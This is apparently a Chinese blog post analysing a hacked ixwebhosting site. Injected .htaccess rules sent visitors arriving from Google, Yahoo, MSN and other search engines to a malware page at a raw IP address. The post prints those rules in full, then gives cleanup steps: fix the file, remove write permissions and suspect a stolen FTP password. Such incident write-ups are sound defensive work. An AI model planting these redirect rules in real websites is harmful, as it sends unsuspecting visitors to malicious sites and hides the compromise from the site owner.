安全问题是互联网十分关注的焦点,在以前也介绍过ixwebhosting空间的安全性是很有保障的。它自身的侦察能力和维护能力都是很强的,但在现实中很可能会遇到很棘手的问题。今天就和大家从实例中来分析解决一个棘手的问题。

具体情况:当直接进入网站没有问题,但从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。如下图:

分析原因: 网站的.htaccess文件被修改,会加入如下代码:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

      上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向。

解决办法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。

      接到IX官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。

      互联网安全一直是很多人研究的事情,在日益蓬勃的网络世界,发现问题,分析问题,解决问题是我们一直惯用的模式。所以,像IX这样棘手的问题沿着思路走。